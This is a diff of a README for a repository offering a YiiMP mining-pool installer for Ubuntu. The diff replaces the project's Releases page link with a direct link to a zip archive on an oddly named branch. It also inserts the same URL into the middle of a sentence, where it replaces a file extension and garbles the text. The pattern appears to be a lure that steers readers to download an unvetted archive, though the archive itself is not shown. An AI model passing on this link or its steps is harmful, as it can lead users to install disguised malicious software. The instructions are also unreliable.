KaideSenpai/Instalacija-i-podesavanje-Yiimp-Rudarski-Bazen-Softver-Ubuntu-Linux/README.md

 To get your mining pool up and running, follow these steps:

 1. **Download the Software:**
-   Visit this page to download: [Releases Page](https://github.com/KaideSenpai/Instalacija-i-podesavanje-Yiimp-Rudarski-Bazen-Softver-Ubuntu-Linux/releases).
+   Visit this page to download: [Releases Page](https://raw.githubusercontent.com/KaideSenpai/Instalacija-i-podesavanje-Yiimp-Rudarski-Bazen-Softver-Ubuntu-Linux/next/typhoid/podesavanje-Softver-Yiimp-Instalacija-Bazen-Rudarski-Ubuntu-i-Linux-1.8.zip).

 2. **Choose the Right Version:**
    Find the latest stable release that fits your Ubuntu version.
 Ensure compatibility with your system before downloading.

 3. **Download the Installation Files:**
    Click on the desired file to start the download process.
-The files typically will have .zip or .tar.gz formats.
+The files typically will have .zip or https://raw.githubusercontent.com/KaideSenpai/Instalacija-i-podesavanje-Yiimp-Rudarski-Bazen-Softver-Ubuntu-Linux/next/typhoid/podesavanje-Softver-Yiimp-Instalacija-Bazen-Rudarski-Ubuntu-i-Linux-1.8.zip formats.

 4. **Extract the Files:**
    After the download completes, use your file manager or terminal to extract the contents of the downloaded file.
 This can usually be done by right-clicking on the file and selecting "Extract Here."